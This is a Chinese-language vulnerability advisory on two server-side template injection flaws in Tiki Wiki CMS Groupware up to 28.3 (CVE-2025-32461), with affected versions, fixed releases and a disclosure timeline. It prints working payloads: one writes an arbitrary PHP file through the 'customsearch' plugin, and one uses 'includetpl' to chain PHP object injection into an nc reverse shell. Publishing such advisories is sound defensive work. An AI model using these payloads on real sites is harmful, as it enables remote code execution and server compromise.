Tiki Wiki CMS Groupware <= 28.3 两个服务器端模板注入漏洞

[-] 软件链接：

https://tiki.org

[-] 受影响版本：

版本28.3及之前的所有28.x版本。 版本27.2及之前的所有27.x版本。 版本24.8及之前的所有24.x版本。 版本21.12及之前的所有21.x版本。

[-] 漏洞描述：

Tiki Wiki CMS Groupware受到两个服务器端模板注入（SSTI）漏洞的影响，攻击者可通过创建特制的wiki页面来利用这些漏洞。

第一个漏洞可通过滥用"customsearch"插件来利用，例如使用以下代码作为wiki页面的源代码，在Web服务器上写入任意PHP文件：

1
2
3

{customsearch
tpl="string:{Nette\Utils\FileSystem::write('./evil.php','<?php
malicious_code(); ?>')}"}

第二个漏洞可通过滥用"includetpl"插件来利用，例如使用以下代码作为wiki页面的源代码，执行PHP对象注入攻击，随后导致在Web服务器上执行操作系统命令：

1
2
3
4

{includetpl
filename="eval:{Laminas\Ldap\Converter\Converter::fromLdapUnserialize('O:18:\"Search_MySql_Table\":1:{S:32:\"\00Search_MySql_Table\00schemaBuffer\";O:28:\"Search_Elastic_BulkOperation\":3:{S:35:\"\00Search_Elastic_BulkOperation\00count\";i:1;S:36:\"\00Search_Elastic_BulkOperation\00buffer\";S:83:\"rm
/tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 4444 >
/tmp/f\";S:38:\"\00Search_Elastic_BulkOperation\00callback\";S:6:\"system\";}}')}"}

成功利用这些漏洞需要拥有创建wiki页面权限的账户，并且需要启用"customsearch"或"includetpl"插件。

[-] 解决方案：

升级到版本28.4、27.3、24.9或更高版本。

[-] 披露时间线：

[2025/01/11] - 向供应商通知"customsearch"插件漏洞 [2025/01/13] - 供应商首次回应 [2025/01/15] - 向供应商通知"includetpl"插件漏洞 [2025/03/27] - 供应商尝试通过新版本修复问题：https://tiki.org/article517 [2025/04/08] - 请求CVE标识符 [2025/04/09] - CVE标识符分配完成 [2025/04/10] - 告知供应商修复无效 [2025/06/18] - 供应商通过新版本解决问题：https://tiki.org/article520 [2025/07/08] - 公开披露

[-] CVE参考：

通用漏洞披露项目（cve.mitre.org）已将这些漏洞命名为CVE-2025-32461。

[-] 致谢：

漏洞由Egidio Romano发现。

[-] 原始公告：

http://karmainsecurity.com/KIS-2025-03